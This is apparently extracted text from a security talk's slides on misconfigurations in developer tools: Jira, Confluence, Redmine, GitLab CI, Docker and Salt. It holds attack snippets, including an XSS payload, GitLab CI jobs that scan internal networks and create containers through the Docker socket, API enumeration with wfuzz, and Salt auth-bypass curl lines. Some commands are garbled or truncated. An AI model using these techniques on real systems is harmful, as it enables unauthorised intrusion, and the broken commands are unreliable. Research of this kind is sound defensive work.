MISCONFIGURATION IN THE DEVELOPER INFRASTRUCTURE
MOROZOV ALEXEY Security myth destroyer What is Misconfiguration?
1) Logical bugs that were allowed as a result of developer negligence (comments left, wired creeds, test functionality) 2) Incorrectly configured hardware configuration or infrastructure services. 3) Insufficient control of access rights. 4) Nobody knows for sure. Application solutions: • Task management systems: Jira, Redmine, Scrum – доски прочее • Continuous integration systems: TeamCity, GitLab Ci, Jenkins; • Bugtrack systems • Containers: docker/lxc; • Wiki-systems • Monitoring and control systems
Task Manager systems
• Jira • Confluence • Redmine • Agile boards • IDE extensions • ….other
Jira Vulnerabilities
• Stack trace: https://jira.
Jira – Stacktrace Jira – Agile board Agile board https://jira.
• https://
Blind JQL https://
https://
• StackTrace: https://confluence.
• https://confluence.ru/rest/api/space • https://confluence.ru/rest/api/content/ • https://confluence.ru/rest/api/space/{SPACEKEY} • https://confluence.ru/rest/api/content/{ContentI}
Reading open spaces Blind CQL api/content/search?cql=space.title~"s.*"
Redmine Redmine - XSS Redmine - XSS Redmine - XSS
!l(“ onerror=alert(/1/))! Redmine - XSS Redmine – basic.Php Worksection broken auth Worksection broken auth Asana Asana – broken session soft_signup_user_id=5166376; soft_signup_email=hac126%40mail.ru; xi_ip=97.12.23.123; soft_signup_invitation_token=numeric_token-5166375- 672796; gtm_u_id=5166376; dapulseUserId=5166375; gtm_u_is_admin=true; gtm_a_paying_value=0.0;
Asana – broken session HiTask HiTask-XSS HiTask-LFI HiTask-LFI HiTask-LFI TFS TFS TEAMCITY - guest TEAMCITY - guest TEAMCITY - guest TEAMCITY - guest DOCKER/LXD API docker run -v /var/run/docker.sock:/var/run/docker.sock debian ls
curl --unix-socket /var/run/docker.sock http://
{ "type": "async", "status": "Operation created", "status_code": 100, "metadata": { "id": "439bf4a1-e056-4b76-86ad-bff06169fce1", "class": "task", "created_at": "2016-04-18T22:56:22.590239576 GIT-LAB
• Intercept source code • API • Enumeration keys • https://gitlab.rambler.ru/al.morozov.keys
GIT-LAB
1) Create file with name .gitlab-ci.yml for scan internal network. job1: script: - ifconfig 2) Scan 2375 port
GIT-LAB
job1: script: - nmap 10.234.0.3/16 –P0 –p 2375 –n –-open –- min-rate=300 GIT-LAB
job1: script: - nmap 10.234.0.3/16 –P0 –p 2375 –n –-open –- min-rate=300 GIT-LAB job1: script: - ip addr - ps aux - curl -s --unix-socket /var/run/docker.sock http:/containers/json
GIT-LAB GIT-LAB
curl -s --unix-socket /var/run/docker.sock "http:/containers/create?name=72701f424a15661108227ea65 a0548dbcbf6f5343207b050431980b71af7f7ec" -X POST -H "Content-Type: application/json" -d '{"Cmd": [ "ls", "-la", "./" ]}' GIT-LAB GitLab (API) - snippets
• https://gitlab.test.ru/explore/snippets • https://gitlab/snippets/648 GitLab (API) - projects
• 1) https://gitlab/api/v4/projects • 2) wfuzz -c -z range,1-10000 --sc=200 https://gitlab/api/v4/projects/FUZZ
GitLab (API) - projects GitLab (API) - users https://gitlab/api/v4/users/
https://gitlab/api/v4/users/2
GitLab (API) - users https://
Sentry
Sentry
Sentry
Salt –Auth ByPass API (0 d.) CVE-2018-15751 curl -si POST https://
Salt –Auth ByPass API (0 d.) CVE-2018-15751 curl -isi -H POST 'X-Auth-Token: https://
ARM sniffer
Given: Device within the network and access to it Task: Sniff traffic from this device. Restrictions: Can’t upload file 1mb disk size Not root
ARM sniffer curlmount -isi -H root_fs_arm.ext2POST 'X-Auth-Token: https://
IPAM curlhttps://
+ 3 BONUS KEYS Rambler – Broken Access Control
Rambler – Broken Access Control
Antichat – Similar threads VoiceCards – Free calls VoiceCards – Free calls
VoiceCards – Free calls
Thank you for attention